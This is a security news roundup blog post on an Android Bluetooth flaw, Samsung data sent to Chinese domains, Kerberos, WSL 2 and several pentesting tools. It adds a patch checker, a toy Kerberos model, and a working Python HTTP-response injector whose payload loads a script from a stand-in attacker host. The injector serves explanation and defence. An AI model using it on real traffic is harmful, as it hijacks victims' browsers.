Android has a CRITICAL bug in its Bluetooth implementation

If you are an Android user you should update your phone/tablet RIGHT NOW! Google has patched a very serious bug (CVE-2020-0022, fixed in the February 2020 security bulletin) in the Bluetooth stack that, get this, can be exploited remotely with no user interaction and has the potential to be turned into a worm! The attacker does have to be within Bluetooth radio range of a device with Bluetooth switched on and has to know its Bluetooth MAC address (on some devices that can be derived from the Wi-Fi MAC address), so this is a "same room or same building" attack rather than an internet-wide one, but that is exactly the kind of reach a worm needs. On Android 8.0 through 9 it gives remote code execution with the privileges of the Bluetooth daemon; even the latest version of Android (10) still has the bug, but there it only crashes the Bluetooth daemon (for now). If your device doesn't receive updates then get a new one or switch to using an iPhone/iPad (which I believe is far more secure). You can confirm you have the fix by checking that the security patch level under Settings > About phone reads 2020-02-01 or later.
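As an added check (not part of the original post), here is the triage logic I would use on a fleet of devices: read the two build properties that `adb shell getprop` prints and classify the device as patched, RCE-exposed (Android 8.0/8.1/9 below the 2020-02-01 patch level), DoS-only (Android 10 below that level) or unknown (versions the disclosure did not assess). The sample `getprop` output is constructed, not from a real device.

```python
"""Classify a device's exposure to CVE-2020-0022 from its Android build properties.

Inputs are the values of
    adb shell getprop ro.build.version.release
    adb shell getprop ro.build.version.security_patch
The version/outcome mapping follows the February 2020 Android security bulletin and the
public disclosure: RCE on 8.0/8.1/9, Bluetooth daemon crash on 10, fixed at 2020-02-01.
Android 7 and earlier were not assessed in the disclosure, so they are reported as unknown.
"""
from datetime import date

FIXED_PATCH_LEVEL = date(2020, 2, 1)


def parse_patch_level(value: str) -> date:
    """Parse the YYYY-MM-DD string in ro.build.version.security_patch."""
    y, m, d = (int(part) for part in value.strip().split("-"))
    return date(y, m, d)


def major_version(release: str) -> int:
    """'9', '8.1.0', '10' -> 9, 8, 10."""
    return int(release.strip().split(".")[0])


def assess(release: str, security_patch: str) -> str:
    """Return 'patched', 'rce', 'dos' or 'unknown' for the given properties."""
    if parse_patch_level(security_patch) >= FIXED_PATCH_LEVEL:
        return "patched"
    major = major_version(release)
    if major in (8, 9):
        return "rce"      # remote code execution inside the Bluetooth process
    if major == 10:
        return "dos"      # only crashes the Bluetooth daemon
    return "unknown"      # not covered by the disclosure; treat as suspect


def parse_getprop(getprop_text: str) -> dict:
    """Parse the '[name]: [value]' lines that a bare `adb shell getprop` prints."""
    props = {}
    for line in getprop_text.splitlines():
        line = line.strip()
        if not line.startswith("[") or "]: [" not in line:
            continue
        name, _, value = line.partition("]: [")
        props[name[1:]] = value[:-1]
    return props


def assess_getprop_output(getprop_text: str) -> str:
    props = parse_getprop(getprop_text)
    return assess(props.get("ro.build.version.release", "0"),
                  props.get("ro.build.version.security_patch", "1970-01-01"))


# Constructed sample output, in the format `adb shell getprop` prints (not from a real device).
SAMPLE_GETPROP = """\
[ro.build.version.release]: [9]
[ro.build.version.security_patch]: [2019-12-05]
[ro.product.model]: [example-device]
"""

if __name__ == "__main__":
    print(assess_getprop_output(SAMPLE_GETPROP))
```

Pipe the real output in with `adb shell getprop | python3 check.py` style plumbing, or just call `assess()` with the two values; the patch level is the authoritative signal, the Android version only decides how bad an unpatched device is.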

Links:

Samsung Android devices are sending data to Chinese domains

A Reddit user first noticed his Samsung device making calls out to Chinese-owned domains. The software responsible is installed on nearly all of Samsung's line of Android products, including their smartphones and tablets. Further research revealed that Samsung had partnered with Qihoo 360, a Chinese firm with a reputation for censoring users at the request of the Chinese government, to build the storage cleaner inside the Device Care app, and that component can't be uninstalled from the device. Samsung released a public statement saying that the only data being sent to China is the device model, storage information, and operating system version [for now].

Links:

Great visual guide to how Kerberos works in Windows Active Directory networks

Today on Twitter I found a really easy-to-follow walkthrough of how Kerberos works in Windows Active Directory networks. It takes you through each step of the authentication process, which machines are involved and what is happening under the hood. It's a great read for anyone wanting to know more about how modern Windows authentication works.
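To make the steps concrete, here is an added toy implementation of the three exchanges the guide walks through (AS-REQ/AS-REP at logon, TGS-REQ/TGS-REP for a service ticket, AP-REQ at the target server). It is my own example, not the guide's material: the "encryption" is a stand-in (SHA-256 keystream plus HMAC) rather than Kerberos' AES or RC4 etypes, and the realm contents (user alice, service cifs/fileserver, the krbtgt account and the passwords) are assumptions. What it does show faithfully is who holds which key, which party can open which blob, and why the target server never has to call the domain controller.

```python
"""Toy Kerberos AS / TGS / AP exchange in the shape Active Directory uses."""
import hashlib, hmac, json, os, time

SKEW = 300  # Kerberos rejects timestamps more than 5 minutes off the KDC clock


def derive_key(password: str) -> bytes:
    # AD derives AES keys from the password with PBKDF2 (or uses the NT hash for RC4);
    # a plain salted hash stands in for that here.
    return hashlib.sha256(b"toy-salt:" + password.encode()).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(length // 32 + 1))


def seal(key: bytes, data: dict) -> bytes:
    """Encrypt-then-MAC a JSON object; only a holder of `key` can read or forge it."""
    pt, nonce = json.dumps(data).encode(), os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("bad key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))


class KDC:
    """Domain controller: knows every principal's key, including krbtgt's."""
    def __init__(self, keys: dict):
        self.keys = keys

    def as_exchange(self, client: str, preauth: bytes):
        """AS-REQ -> AS-REP: TGT sealed with the krbtgt key, session key sealed with the client key."""
        ts = unseal(self.keys[client], preauth)["timestamp"]   # wrong password fails here
        if abs(time.time() - ts) > SKEW:
            raise ValueError("pre-auth timestamp outside allowed skew")
        session = os.urandom(32)
        tgt = seal(self.keys["krbtgt"], {"client": client, "session": session.hex(),
                                         "expires": time.time() + 600})
        return tgt, seal(self.keys[client], {"session": session.hex()})

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, service: str):
        """TGS-REQ -> TGS-REP: the client key is never used again; the KDC trusts the TGT it issued."""
        t = unseal(self.keys["krbtgt"], tgt)
        if t["expires"] < time.time():
            raise ValueError("TGT expired")
        session = bytes.fromhex(t["session"])
        a = unseal(session, authenticator)
        if a["client"] != t["client"] or abs(time.time() - a["timestamp"]) > SKEW:
            raise ValueError("bad authenticator")
        svc_session = os.urandom(32)
        ticket = seal(self.keys[service], {"client": t["client"], "session": svc_session.hex(),
                                           "expires": time.time() + 600})
        return ticket, seal(session, {"service": service, "session": svc_session.hex()})


def client_login(kdc: KDC, name: str, password: str):
    """Workstation side of the AS exchange (what happens at logon)."""
    key = derive_key(password)
    tgt, enc = kdc.as_exchange(name, seal(key, {"timestamp": time.time()}))
    return tgt, bytes.fromhex(unseal(key, enc)["session"])


def client_get_service_ticket(kdc: KDC, name: str, tgt: bytes, session: bytes, service: str):
    """TGS exchange, then build the AP-REQ authenticator for the service."""
    auth = seal(session, {"client": name, "timestamp": time.time()})
    ticket, enc = kdc.tgs_exchange(tgt, auth, service)
    svc_session = bytes.fromhex(unseal(session, enc)["session"])
    return ticket, seal(svc_session, {"client": name, "timestamp": time.time()})


def service_accept(service_key: bytes, ticket: bytes, authenticator: bytes) -> str:
    """AP-REQ at the target server: validated with its own key, no call to the KDC."""
    t = unseal(service_key, ticket)
    a = unseal(bytes.fromhex(t["session"]), authenticator)
    if a["client"] != t["client"] or t["expires"] < time.time():
        raise ValueError("rejected")
    return t["client"]


def run_example(password: str = "Winter2020!") -> str:
    """Assumed realm: user alice (password Winter2020!), service cifs/fileserver, krbtgt."""
    keys = {"alice": derive_key("Winter2020!"), "krbtgt": os.urandom(32),
            "cifs/fileserver": os.urandom(32)}
    kdc = KDC(keys)
    tgt, session = client_login(kdc, "alice", password)
    ticket, ap_req = client_get_service_ticket(kdc, "alice", tgt, session, "cifs/fileserver")
    return service_accept(keys["cifs/fileserver"], ticket, ap_req)


if __name__ == "__main__":
    print(run_example())
```

Two things worth noticing while reading it: the TGT is opaque to the client because only the KDC holds the krbtgt key (which is why stealing that key lets an attacker mint golden tickets), and the service ticket is opaque to everyone but the service and the KDC (which is why a weak service account password makes Kerberoasting possible).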

Links:

Microsoft Windows Subsystem for Linux 2

In May of 2019 Microsoft (MS) announced a major update to the Windows Subsystem for Linux (WSL). The original WSL (now called WSL 1) is not a virtual machine at all: it is a translation layer that implements Linux system calls on top of the NT kernel, which is why some syscall-heavy tools and things like Docker never worked in it. WSL 2 instead runs a real Linux kernel inside a lightweight Hyper-V based virtual machine, which greatly enhances both the capabilities and the speed (file system performance in particular) of the subsystem. It went out to Windows Insiders in June 2019 and became generally available in Windows 10 version 2004. They haven't really publicized its release very well, which is why I'm making a post to promote it. Next time you play a CTF, instead of using a Kali VM try out WSL 2 with Kali installed from the Microsoft Store! One caveat: the WSL 2 VM sits behind a NAT on the Windows host and has no raw access to Wi-Fi or USB adapters, so wireless and hardware attacks still want a real Linux box or a VM with device passthrough.

Links:

FireEye’s Commando VM: The first offensive Windows distro

At first I could only laugh at the fact that someone had bothered making a Windows pentesting distribution, but upon closer inspection it is well suited for taking advantage of the Windows Remote Management (WinRM) capabilities that ship with all modern versions of Windows (the listener on TCP 5985/5986 is on by default on Windows Server 2012 and later, but has to be enabled on client editions). This means you can remotely control any Windows machine in the domain that has WinRM enabled if you have the right credentials, using nothing more than native PowerShell remoting (Enter-PSSession / Invoke-Command). Since Microsoft introduced Windows Subsystem for Linux v2 (WSL2) you now have the ability to run Kali on a Windows system, but Linux-side tooling for Windows-native protocols such as WinRM (WS-Management, SOAP over HTTP with NTLM or Kerberos authentication) is still less mature than the real thing. Commando VM includes core tools such as Covenant, nmap, Wireshark, etc. I will post the GitHub link to the Hacker Tools page.

Links:

New MitM Framework: Xerosploit

Xerosploit is a Python script built on top of nmap and bettercap 1.x (the Ruby version, which is why new modules are written in Ruby). It comes with the ability to ARP-spoof a target and modify HTML over the wire to inject malicious JavaScript, an iframe, or other client-side web attacks into the pages the victim loads. Note that this only works against cleartext HTTP: responses from a site served over HTTPS, and especially one that sets HSTS, cannot be rewritten by an on-path attacker. It also imitates the Metasploit console interface to make it easier for pentesters who already know msfconsole to pick up. I have also put this on the Hacker Tools page.
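To show what the "modify HTML over the wire" step actually involves, here is an added example (my own code, not Xerosploit's or bettercap's) of the rewrite an on-path proxy has to perform on a captured HTTP response: find the body, insert the payload before the closing body tag, and fix Content-Length so the browser neither truncates the page nor hangs waiting for bytes that never come. It also shows the cases a real injector has to refuse: compressed or chunked bodies and non-HTML responses. The response bytes are constructed, and the attacker callback host in the payload is an assumption.

```python
"""Inject a payload into a cleartext HTTP response the way an on-path HTML injector must."""

# Assumed attacker-controlled host; the victim's browser would fetch and run this script.
PAYLOAD = b'<script src="http://attacker.example/hook.js"></script>'


def inject_into_response(raw: bytes, payload: bytes = PAYLOAD) -> bytes:
    """Return `raw` with `payload` injected before </body>, or `raw` unchanged if not injectable."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw                                   # no header/body boundary yet
    headers = head.split(b"\r\n")
    lower = [h.lower() for h in headers]
    # Only plain, uncompressed HTML can be patched byte-for-byte. bettercap strips
    # Accept-Encoding from the request for exactly this reason.
    if not any(h.startswith(b"content-type:") and b"text/html" in h for h in lower):
        return raw
    if any(h.startswith((b"content-encoding:", b"transfer-encoding:")) for h in lower):
        return raw                                   # gzip/chunked would need re-encoding
    idx = body.lower().rfind(b"</body>")
    if idx == -1:
        return raw
    new_body = body[:idx] + payload + body[idx:]
    new_headers = []
    for h, l in zip(headers, lower):
        if l.startswith(b"content-length:"):
            h = b"Content-Length: " + str(len(new_body)).encode()   # keep the framing honest
        new_headers.append(h)
    return b"\r\n".join(new_headers) + b"\r\n\r\n" + new_body


def content_length(raw: bytes) -> int:
    """Read the Content-Length header of a response (-1 if absent)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    for h in head.split(b"\r\n"):
        if h.lower().startswith(b"content-length:"):
            return int(h.split(b":", 1)[1].strip())
    return -1


# Constructed sample response, as a victim's browser would receive it over plain HTTP.
SAMPLE_BODY = b"<html><body><h1>Welcome</h1></body></html>"
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Content-Type: text/html; charset=utf-8\r\n"
                   b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
                   b"\r\n" + SAMPLE_BODY)

if __name__ == "__main__":
    print(inject_into_response(SAMPLE_RESPONSE).decode())
```

The defensive reading of the same code: every refusal branch is a place the attack fails, and HTTPS removes the attacker's ability to see or alter the bytes at all, which is why HSTS on your own sites is the cheap fix for this whole class of tool.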

Links:

HomePwn – Swiss Army Knife for Pentesting of IoT Devices

I just found a new Internet of Things (IoT) testing framework called HomePwn. It boasts the following features:

    • Bluetooth Low-Energy (BLE)
    • WiFi
    • Near Field Communication (NFC)
    • Simple Service Discovery Protocol (SSDP)
    • Multicast Domain Name System (MDNS)
    • Xiaomi device support
    • SmartTV support
    • Metasploit-like command line interface

Here's a link to the GitHub repo, and I have also put this tool on the Hacker Tools page: http://bit.ly/378i0z1